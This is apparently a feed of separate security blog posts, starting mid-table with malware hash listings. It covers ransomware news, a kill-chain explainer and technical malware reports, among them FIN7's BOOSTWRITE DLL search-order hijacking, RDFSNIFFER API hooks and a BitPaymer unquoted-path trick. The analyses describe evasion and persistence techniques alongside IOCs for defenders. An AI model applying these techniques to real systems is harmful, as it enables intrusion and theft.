650a3dce1380f9194361e0c7be9ffb97

0xeaa61f82

DEADEYE.APPEND

POISONPLUG

7dc6bbc202e039dd989e1e2a93d2ec2d

0xa8c5a006

DEADEYE.APPEND

LOWKEY

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

0x9438158b

DEADEYE.APPEND

LOWKEY

904bbe5ac0d53e74a6cefb14ebd58c0b

0xde82ce06

DEADEYE.APPEND

POISONPLUG

c11dd805de683822bf4922aecb9bfef5

0xcab011e1

DEADEYE.APPEND

LOWKEY.HTTP

d49c186b1bfd7c9233e5815c2572eb98

0x4a23bd79

DEADEYE.APPEND

LOWKEY

e58d4072c56a5dd3cc5cf768b8f37e5e

0x243e2562

None - encrypted data

XMRIG

eb37c75369046fb1076450b3c34fb8ab

0x00e5a39e

DEADEYE.APPEND

LOWKEY

ee5b707249c562dc916b125e32950c8d

0xdecb3d5d

DEADEYE.APPEND

POISONPLUG

ff8d92dfbcda572ef97c142017eec658

0xde82ce06

DEADEYE.APPEND

POISONPLUG

ffd0f34739c1568797891b9961111464

0xde82ce06

DEADEYE.APPEND

POISONPLUG

Appendix 1: List of samples with RC5 encrypted payloads

Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF)

Estimated reading time: 2 minutes

A shift to prioritize data security investments through a Data Security Governance Framework (DSGF) was among the top seven security and risk management trends identified by global research & advisory firm Gartner in 2019.

Breaking it down, the report observed that the changing paradigm of security meant that enterprises were required to identify other frameworks for protecting data. The first step involves the understanding of the data generated by asking questions such as:

  • Why was this data created?
  • When was it created?
  • How will it be used?
  • Is this data compliant with the regulations my business needs to adhere to?
  • Can the original owner of the data make a request to get it deleted?

A framework for better data security

By answering these questions, enterprises can create a Data Security Governance Framework (DSGF) to better utilize and protect data. The research recommends this approach over acquiring data protection products and trying to adapt to them to suit a business need. A Data Security Governance Framework (DSGF) provides a blueprint that is organization-centric which classifies data assets and provides the bedrock for data security policies.

In this framework, there is no one-size-fits-all solution. Every enterprise approaches data security on a case-by-case basis, trying to understand their unique data security requirements in the hopes of finding unique solutions.

The need for better alignment

The framework helps to provide a balance between the business need to maximize competitive advantage and the need to apply appropriate security policy rules. Adopting this framework will require greater collaboration within an enterprise’s Information Security Team regarding aligning approaches for data classification and lifecycle management. This involves classifying data according to unique requirements – which dataset is the most important and requires maximum security?

Different businesses use different methods for protecting data –

Data Masking

A method through which data at rest or in motion is masked which protects it but also ensures that it is usable. It helps organizations raise their level of security for sensitive data while conforming to privacy regulations and other compliances.

Data Audit and Protection

This method uses active data control, monitoring and logging to check and detect suspicious activities.

Unusual behaviour and anomalies are detected and flagged and acted upon instantly by stopping suspicious users from accessing critical data and flagging network administrators about this behaviour. Data is separated from users as per their roles.

DSGF can be a useful tool for enterprises to plan their data security investments and allocations. The framework helps an enterprise understand their own requirements clearly and helps enterprises to make better decisions on investment purposes. Some of the key details that DSGF can help in are in:

  • Volume, veracity and variety details of each type of dataset
  • Business risks and financial impacts of each dataset
  • Data residency issues affecting each dataset, specifically as there are different data privacy laws for different geographies and jurisdictions
  • Asset management data
  • Consistent access and usage policies for different datasets

Rather than using technology to solve their data security issues, enterprises must ideally use the Data Security Governance Framework (DSGF) to understand and identify their own business requirements. Once the identification is conducted and a framework is created, it would then be prudent to identify the appropriate technology solution for an enterprise’s own data needs.

However, if you want expert consultation on your current framework, please contact us and we will be glad to advise you.

The post Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF) appeared first on Seqrite Blog.

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced to have restored normal operation after paying the ransom request by crooks that infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted out to pay the ransom and announced to have restored normal operation.

The hospital chain hasn’t revealed the amount it has paid to the crooks to decrypt the data, it seems that an insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the infrastructures had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals have been infected with a variant of the Ryuk ransomware, internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

Security Affairs newsletter Round 235

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Hacker is auctioning a database containing details of 92 million Brazilians
Iran-linked Phosphorus group hit a 2020 presidential campaign
UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities
D-Link router models affected by remote code execution issue that will not be fixed
Data from Sephora and StreetEasy data breaches added to HIBP
PoS malware infections impacted four restaurant chains in the U.S.
US will help Baltic states to secure baltic energy grid
Developer hacked back Muhstik ransomware crew and released keys
Experts found a link between a Magecart group and Cobalt Group
Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild
MS October 2019 Patch Tuesday updates address 59 flaws
Users reported problems with patches for CVE-2019-1367 IE zero-day
Hackers compromised Volusion infrastructure to siphon card details from thousands of sites
Multiple APT groups are exploiting VPN vulnerabilities, NSA warns
Researchers discovered a code execution flaw in NSA GHIDRA
Twitter inadvertently used Phone Numbers collected for security for Ads
vBulletin addresses three new high-severity vulnerabilities
Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware
Attor malware was developed by one of the most sophisticated espionage groups
iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware
Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012
SAP October 2019 Security Patch Day fixes 2 critical flaws
Tor Project is going to remove End-Of-Life relays from the network
Hacker breached escort forums in Italy and the Netherlands and is selling user data
Researchers released a free decryptor for the Nemty Ransomware
Sophos fixed a critical vulnerability in Cyberoam firewalls
Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
Top cybersecurity certifications to consider for your IT career
FIN7 Hackers group is back with a new loader and a new RAT
Leafly Cannabis information platform suffered a data leak
SIM cards used in 29 countries are vulnerable to Simjacker attack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 235 appeared first on Security Affairs.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns

Confiant researchers have discovered a new Mac malware dubbed Tarmac distributed via malvertising campaigns in the US, Italy, and Japan.

Security experts at Confiant have discovered a new Mac malware dubbed Tarmac that is distributed via malvertising campaigns in the US, Italy, and Japan.

“Malicious ads redirect victims to sites showing popups peddling software updates, mainly Adobe Flash Player updates, that once executed will install first install the OSX/Shlayer MacOS malware, which then execute the final payload, the OSX/Tarmac” reads the analysis.

“Indeed, that’s not the official Adobe installer but a fake Flash Player installer that was signed using an Apple developer certificate 2L27TJZBZM issued probably to a fake identity named : Fajar Budiarto

Malware authors use to sign malware with Apple developer certificates because it is quite easy to do and allow their code to bypass security protections like Gatekeeper and XProtect.

Tarmac

This malvertising campaign distributing the two malware Shlayer and Tarmac began in January, but at the time experts did not spot the Tarmac malicious code.

Tarmac acts as a second-stage payload for the Shlayer infection, experts pointed out that at the time of the analysis the command and control servers had been shut down and the samples they analyzed were relatively old. Experts believe the campaign is still ongoing and threat actors likely changed its infrastructure.

Tarmac gathers information about the infected hardware and sends it to the C2 servers, then it waits for commands.

At the time of the analysis, it was not possible to understand which commands the malware supports because the C&C servers were down.

Experts noticed that most of key components strings are protected with custom encryption and compression in the attempt to thwart analysis.

ZDNet reported that the malvertising campaign that distributed the Shlayer and Tarmac combo was targeted at users located in the US, Italy, and Japan.

The analysis published by the experts also includes additional technical details along with indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Tarmac, malvertising)

The post A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns appeared first on Security Affairs.

Threat Roundup for October 4 to October 11

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Oct 4 and Oct 11. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10112019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape, the name of the ransomware comes after the extension it adds to the encrypted file names. The malicious code also deletes their shadow copies to make in impossible any recovery procedure.

Below the ransom note dropped by the Nemty ransomware after the encryption process is completed. Attackers demand the payment of a 0.09981 BTC ransom (roughly $1,000) through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware, according to the popular malware researcher Vitali Kremez, the ransomware is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, they also announced a working tool for version 1.5.

The security form is also working with Europol to get its decryptors included in their NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, anyway, researchers are working to improve it and support other file types.

Tesorion is not allowing victims to generate the decryption keys with their client, instead, it is allowing victims to retrieve the decryption key by generating it on its own servers.

Victims can contact the Tesorion CSIRT and request help with the Nemty Ransomware, in turn the company will then send a link to the decryptor that will allow you to decrypt the files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims can upload their files on the Tesorion serves that will use it to calculate the decryption key, then the key is sent back to the victims that can load is in the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

What is the kill chain and the seven steps involved in it?

Estimated reading time: 2 minutes

The term ‘kill chain’ originated in the military as a concept to outline and define each stage of an attack. It has found its way into cybersecurity as well as a means to understand the structure of a cyber attack and disrupt it. There are seven defined phases of the kill chain with each phase having a specific utility to the attacker.

For enterprises waging a relentless war against cyber attackers, it is essential to understand each stage of the kill chain to make guided interventions when required and block the attack. In 2013, Lockheed Martin, the global American military giant, used this model to stop a SecurID attack.

Here are the seven phases that comprise the kill chain:

Phase 1: Reconnaissance

This phase involves both, passive and active reconnaissance on the part of the attacker. Identification of a vulnerable target is the most important objective of this phase and in pursuit of the objective, attackers will try and gather as much data and knowledge they can on their targets. This is a preparation phase before the launching of a cyber attack.

Phase 2: Weaponization

Once the Reconnaissance phase is complete, the attacker will move on to the next phase which is Weaponization. In this phase, the attacker will decide on the best type of tool they have at their disposal to carry out their attack on the target. This decision will be based on the findings of the Reconnaissance phase. The attacker could use methods like a Distributed Denial of Service (DDoS) attack, a botnet attack or malware to attack unpatched systems.

Phase 3: Delivery

The Delivery phase involves the attacker to deliver the attack through a malicious payload. This payload can be delivered through a variety of means: a phishing email, a drive-by-download attack or spear phishing.

Phase 4: Exploitation

At the Exploitation phase, the attacker exploits the vulnerability that has been discovered to carry out their attack. The targeted system is typically compromised and the attack enters the system. At this stage, the attacker has already gained a foothold and may try to make further intrusions by installing other malware.

Phase 5: Installation

After the Exploitation phase, the Installation phase involves the malicious software being installed and multiplying inside the breached system. Users may unknowingly install and spread the malware on their systems by taking actions such as sending infected emails to other users. The breaches may multiply across the affected network.

Phase 6: Command & Control

At this stage, the attacker is in full control. After successfully gaining entry and breaching an enterprise’s defenses, the malware can be fully commanded and controlled by the attacker who can use it for any malicious purposes. This can include sending back confidential information, passwords, emails or anything else the attacker seeks.

Phase 7: Action on Objectives

This is the seventh and the final stage of a cyber attack. This phase is defined as the ‘Action on Objectives’ phase and refers to the final actions which an attacker takes on conducting a successful attack. An attack could have various goals – to extract a ransom through a ransomware attack, to sell data on the Dark Web or to leak confidential information to a rival enterprise.

It is important for enterprises to understand and remain prepared for each phase of a cyber attack. As outlined above, every phase is different and requires the corresponding action.

Seqrite’s solutions enable better protection at every stage and ensure enterprises stay secure against cyber attacks.

The post What is the kill chain and the seven steps involved in it? appeared first on Seqrite Blog.

Details on Uzbekistan Government Malware: SandCat

Kaspersky has uncovered an Uzbeki hacking operation, mostly due to incompetence on the part of the government hackers.

The group's lax operational security includes using the name of a military group with ties to the SSS to register a domain used in its attack infrastructure; installing Kaspersky's antivirus software on machines it uses to write new malware, allowing Kaspersky to detect and grab malicious code still in development before it's deployed; and embedding a screenshot of one of its developer's machines in a test file, exposing a major attack platform as it was in development. The group's mistakes led Kaspersky to discover four zero-day exploits SandCat had purchased from third-party brokers to target victim machines, effectively rendering those exploits ineffective. And the mistakes not only allowed Kaspersky to track the Uzbek spy agency's activity but also the activity of other nation-state groups in Saudi Arabia and the United Arab Emirates who were using some of the same exploits SandCat was using.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind BitPaymer and ransomware attacks has been found exploiting Windows zero-day for Apple iTunes and iCloud.

The cybercriminals behind BitPaymer and iEncrypt ransomware attacks have been found exploiting a Windows zero-day vulnerability for Apple iTunes and iCloud in attacks in the wild.

The zero-day vulnerability resides in the Bonjour updater that comes packaged with Apple’s iTunes and iCloud software for Windows to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically download the updates for Apple software. Experts pointed out that the Bonjour updater has its own installation entry in the installed software section and a scheduled task to execute the process. This means that even uninstalling iTunes and iCloud doesn’t remove Bonjour updater.

The experts discovered that the Bonjour updater was vulnerable to the unquoted service path vulnerability.

Unquoted search paths are a relatively older vulnerability that occurs when the path to an executable service or program (commonly uninstallers) are unquoted and contain spaces. The spaces can allow someone to place their own executable in the path and get it to be executed instead.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”

bitpaymer campaign

Experts explained that attackers using a legitimate process signed by a trusted vendor, like Bonjour, will be able to execute a new malicious child process evading detection. In this specific attack, security programs have not scanned the malicious payloads because they did not use an extension,

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges.

Morphisec Labs reported their discovery to Apple that released iCloud for Windows 10.7iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users that have installed an Apple software on their Windows computer and then uninstalled it, should manually uninstall the Bonjour updater if present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

New Reductor Nation-State Malware Compromises TLS

Kaspersky has a detailed blog post about a new piece of sophisticated malware that it's calling Reductor. The malware is able to compromise TLS traffic by infecting the computer with hacked TLS engine substituted on the fly, "marking" infected TLS handshakes by compromising the underlining random-number generator, and adding new digital certificates. The result is that the attacker can identify, intercept, and decrypt TLS traffic from the infected computer.

The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we're quite sure the new malware was developed by the COMPfun authors.

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn't identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia and Belarus.

[...]

Turla has in the past shown many innovative ways to accomplish its goals, such as using hijacked satellite infrastructure. This time, if we're right that Turla is the actor behind this new wave of attacks, then with Reductor it has implemented a very interesting way to mark a host's encrypted TLS traffic by patching the browser without parsing network packets. The victimology for this new campaign aligns with previous Turla interests.

We didn't observe any MitM functionality in the analyzed malware samples. However, Reductor is able to install digital certificates and mark the targets' TLS traffic. It uses infected installers for initial infection through HTTP downloads from warez websites. The fact the original files on these sites are not infected also points to evidence of subsequent traffic manipulation.

The attribution chain from Reductor to COMPfun to Turla is thin. Speculation is that the attacker behind all of this is Russia.

Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET found an advanced malware piece of malware named Attor, targeting diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced malware piece of malware named Attor, that was used in cyberespionage operations on diplomats and high-profile Russian-speaking users in Eastern Europe.

Attor malware

Threat actors have been using Attor since 2013, the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor a state-sponsored group involved in highly targeted attacks on selected targets.

Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was specifically developed to infect mainly Russian-speaking users, it targets popular Russian apps and services, including the social networks Odnoklassniki, and VKontakt, VoIP provider Multifon, IM apps Qip and Infium, search engine Rambler, email clients Yandex and Mail.ru, and payment system WebMoney.

The malware implements a modular structure with a dispatcher and loadable plugins, all of which are implemented as dynamic-link libraries (DLLs). The attackers first compromise the target dropping the components on disk, then loads the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA, then they are recovered in memory, using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected. “

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered. ” continues the analysis.

The analysis of the samples of the malware revealed the presence of an interesting module designed to detect when users connected modems and older phones to their devices. The malware is able to collect info about the files present on connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

BOOSTWRITE Loader: Where You At?

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

Once the key and the IV are downloaded the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32.DLLs which, if the tests pass, are loaded into memory without touching the filesystem.

The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

Loading...
Starting...
Init OK
Key OK
Data: 4606941
HS: 20
K:[32] V:[8]
DCnt: 732642317(ERR)

Figure 1: BOOSTWRITE log file

Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER Module: We Smell a RAT

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

Win32 API Function

Hook Description

CertVerifyCertificateChainPolicy

Used to man-in-the-middle SSL sessions

CertGetCertificateChain

Used to man-in-the-middle SSL sessions

WSAConnect

Used to man-in-the-middle socket connections

connect

Used to man-in-the-middle socket connections

ConnectEx

Used to man-in-the-middle socket connections

DispatchMessageW

Used to hijack the utility's UI

DispatchMessageA

Used to hijack the utility's UI

DefWindowProcW

Used to hijack the utility's UI

DefWindowProcA

Used to hijack the utility's UI

GetLastInputInfo

Used to change the user's last input time (to avoid timed lock outs)

Table 1: RDFSNIFFER’s Hooked Win32 API Functions

This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

Command Name

Legit Function in RDFClient

RDFClient Command ID

Description

Upload

FileMgrSendFile

107

Uploads a file to the remote system

Download

FileMgrGetFile

108

Retrieves a file from the remote system

Execute

RunCommand

3001

Executes a command on the remote system

DeleteRemote

FileMgrDeleteFile

3019

Deletes file on remote system

DeleteLocal

-

-

Deletes a local file

Table 2: RDFSNIFFER’s Backdoor Functions

Signed: Yours Truly, FIN7

While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued by MANGO ENTERPRISE LIMITED (Table 3).

MD5

Organization

Country

Serial

a67d6e87283c34459b4660f19747a306

mango ENTERPRISE LIMITED

GB

32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B

Table 3: Code signing certificate used for BOOSTWRITE

This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).


Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7 as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum– illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye) and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

Outlook and Implications

While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.

Type

Indicator(s)

BOOSTWRITE (signed)

MD5: a67d6e87283c34459b4660f19747a306
SHA-1: a873f3417d54220e978d0ca9ceb63cf13ec71f84
SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5

C2: 109.230.199[.]227

BOOSTWRITE (unsigned)

MD5: af2f4142463f42548b8650a3adf5ceb2
SHA1: 09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1
SHA256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0

C2: 109.230.199[.]227

Table 4: Publicly-shareable BOOSTWRITE samples

The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using yara’s PE signature module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.

Timestamp

Description

2019-05-20 09:50:55 UTC

Signed BOOSTWRITE’s PE compilation time

2019-05-22 00:00 UTC
through
2020-05-21 23:59 UTC

Signed BOOSTWRITE’s “mango ENTERPRISE LIMITED” certificate validity window

Table 5: Relevant executabe timestamps

A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

